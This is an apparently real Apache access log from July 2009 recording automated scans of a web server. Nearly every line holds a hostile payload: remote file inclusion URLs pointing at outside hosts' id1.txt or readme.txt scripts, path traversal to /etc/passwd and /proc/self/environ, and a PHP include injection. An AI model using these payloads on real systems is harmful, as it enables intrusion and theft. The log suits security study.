74.223.143.131 - - [18/Jul/2009:03:17:12 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:17:16 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
74.223.143.131 - - [18/Jul/2009:03:17:17 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:17:17 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:17:18 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
190.144.44.36 - - [18/Jul/2009:03:17:19 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:17:19 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:17:25 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:18:34 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
190.144.44.36 - - [18/Jul/2009:03:18:36 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:18:53 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:18:53 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:18:53 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:34 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:37 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:38 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:38 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:40 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:40 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:40 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:19:40 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:19:43 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:19:43 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:19:43 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
114.200.199.144 - - [18/Jul/2009:03:19:45 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.12.51.30 - - [18/Jul/2009:03:20:03 -0400] "GET /index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.12.51.30 - - [18/Jul/2009:03:20:03 -0400] "GET /logs/index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.12.51.30 - - [18/Jul/2009:03:20:04 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:20:06 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:20:07 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:20:07 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:20:09 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
206.225.23.4 - - [18/Jul/2009:03:20:17 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:20:20 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
206.225.23.4 - - [18/Jul/2009:03:20:20 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:20:20 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:20:21 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:20:26 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
206.225.23.4 - - [18/Jul/2009:03:21:03 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:03 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:04 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:04 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:14 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:15 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:15 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:15 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:16 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:21:16 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:21:18 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:21:18 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:21:18 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
210.205.57.2 - - [18/Jul/2009:03:21:24 -0400] "GET //include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:03:21:24 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:03:21:24 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:21:26 -0400] "GET /logs/access_log.Q109070500//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:21:28 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:21:29 -0400] "GET /logs//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 9999 "-" "libwww-perl/5.79"
218.237.66.229 - - [18/Jul/2009:03:21:38 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.12.51.30 - - [18/Jul/2009:03:21:47 -0400] "GET /logs/access_log.Q109062300/index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.12.51.30 - - [18/Jul/2009:03:21:50 -0400] "GET /logs/error_log.Q109062300%20%20/index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:22:09 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Jul/2009:03:22:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.51.115 - - [18/Jul/2009:03:22:27 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
200.12.51.30 - - [18/Jul/2009:03:24:34 -0400] "GET /logs/error_log.Q109062300/index.php?conteudo=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:03:24:40 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:03:24:48 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET //spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 226 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs/access_log.Q109060200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 253 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 231 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs/access_log.Q109060200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET //spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 226 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs/access_log.Q109060200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:25:14 -0400] "GET /logs//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 231 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:25:15 -0400] "GET //spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:25:15 -0400] "GET /logs/access_log.Q109060200//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:03:25:15 -0400] "GET /logs//spaw/spaw_control.class.php?GLOBALS[spaw_root]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "XXXXXX"
70.86.9.234 - - [18/Jul/2009:03:25:37 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:37 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:37 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:40 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:40 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:41 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:45 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:25:48 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
204.30.3.225 - - [18/Jul/2009:03:25:53 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:25:54 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:25:54 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.120.227.242 - - [18/Jul/2009:03:25:59 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:03:26:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:03:26:01 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
204.30.3.225 - - [18/Jul/2009:03:26:15 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:03:26:15 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:26:16 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:26:16 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:26:17 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
204.30.3.225 - - [18/Jul/2009:03:26:28 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
